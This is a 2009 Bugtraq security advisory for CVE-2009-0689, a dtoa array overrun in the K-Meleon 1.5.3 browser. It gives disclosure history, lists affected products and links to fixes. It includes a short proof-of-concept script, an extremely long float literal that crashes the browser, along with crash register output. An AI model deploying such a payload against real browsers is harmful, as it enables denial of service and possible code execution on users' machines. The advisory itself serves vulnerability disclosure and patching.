[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution)

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution)
From: cxib@xxxxxxxxxxxxxxxxxx
Date: Thu, 19 Nov 2009 17:29:14 -0700
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution) ]

Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- - Dis.: 07.05.2009
- - Pub.: 20.11.2009

CVE: CVE-2009-0689
Risk: High
Remote: Yes

Affected Software:
- - K-Meleon 1.5.3

NOTE: Prior versions may also be affected.

Original URL:
http://securityreason.com/achievement_securityalert/72


- --- 0.Description ---
K-Meleon is an extremely fast, customizable, lightweight web browser based on 
the Gecko layout engine developed by Mozilla which is also used by Firefox. 
K-Meleon is free, open source software released under the GNU General Public 
License and is designed specifically for Microsoft Windows (Win32) operating 
systems.


- --- 1. K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution) ---
The main problem exist in dtoa implementation. K-Meleon has the same dtoa as a 
KDE, Opera and all BSD systems. This issue has been fixed in Firefox 3.5.4 and 
fix

http://securityreason.com/achievement_securityalert/63

but fix for SREASONRES:20090625, used by openbsd was not good. 
More information about fix for openbsd and similars SREASONRES:20091030, 

http://securityreason.com/achievement_securityalert/69

We can create any number of float, which will overwrite the memory. In Kmax has 
defined 15. Functions in dtoa, don't checks Kmax limit, and it is possible to 
call 16<= elements of freelist array.


- --- 2. Proof of Concept  (PoC) ---

- -----------------------
<script>
var a=0.<?php echo str_repeat("1",296450); ?>;
</script>
- -----------------------

K-Meleon will crash with

Unhandled exception at 0x01800754 in k-meleon.exe: 0xC0000005: Access violation 
reading location 0x0bc576ec.

01800754  mov         eax,dword ptr [ecx] 

EAX     00000002        
ECX     0BC576EC        
EDI     028FEB51        


- --- 3. SecurityReason Note ---

Officialy SREASONRES:20090625 has been detected in:
- - OpenBSD
- - NetBSD
- - FreeBSD
- - MacOSX
- - Google Chrome
- - Mozilla Firefox
- - Mozilla Seamonkey
- - KDE (example: konqueror)
- - Opera
- - K-Meleon

This list is not yet closed. US-CERT declared that will inform all vendors 
about this issue, however, they did not do it. Even greater confusion caused 
new CVE number "CVE-2009-1563". Secunia has informed that this vulnerability 
was only detected in Mozilla Firefox, but nobody was aware that the problem 
affects other products like ( KDE, Chrome ) and it is based on "CVE-2009-0689". 
After some time Mozilla Foundation Security Advisory
("http://www.mozilla.org/security/announce/2009/mfsa2009-59.html";)
was updated with note :
"The underlying flaw in the dtoa routines used by Mozilla appears to be 
essentially the same as that reported against the libc gdtoa routine by 
Maksymilian Arciemowicz ( CVE-2009-0689)".
This fact ( new CVE number for Firefox Vulnerability )and PoC in javascript 
(from Secunia), forced us to official notification all other vendors. We 
publish all the individual advisories, to formally show all vulnerable software 
and to avoid wrong CVE number. We do not see any other way to fix this issue in 
all products.

Please note:
Patch used in Firefox 3.5.4 does not fully solve the problem. Dtoa algorithm is 
not optimal and allows remote Denial of Service in Firefox 3.5.5 giving long 
float number.


- --- 4. Fix ---
NetBSD fix (optimal):
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h

OpenBSD fix:
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c


- --- 5. Credits ---
Discovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.


- --- 6. Greets ---
Infospec p_e_a pi3


- --- 7. Contact ---
Email: 
- - cxib {a.t] securityreason [d0t} com
- - sp3x {a.t] securityreason [d0t} com 

GPG: 
- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
- - http://securityreason.com/key/sp3x.gpg

http://securityreason.com/
http://securityreason.pl/

-----BEGIN PGP SIGNATURE-----

iEYEARECAAYFAksF2NoACgkQpiCeOKaYa9ZidgCfUul3XpJA9x7xjTmAJTxCa/XU
hiAAoIiVchZUxMkFgHEgXicv+UwhNaz0
=bAay
-----END PGP SIGNATURE-----
Prev by Date: SeaMonkey 1.1.8 Remote Array Overrun (Arbitrary code execution)
Next by Date: KDE KDELibs 4.3.3 Remote Array Overrun (Arbitrary code execution)
Previous by thread: SeaMonkey 1.1.8 Remote Array Overrun (Arbitrary code execution)
Next by thread: KDE KDELibs 4.3.3 Remote Array Overrun (Arbitrary code execution)
Index(es):
- Date
- Thread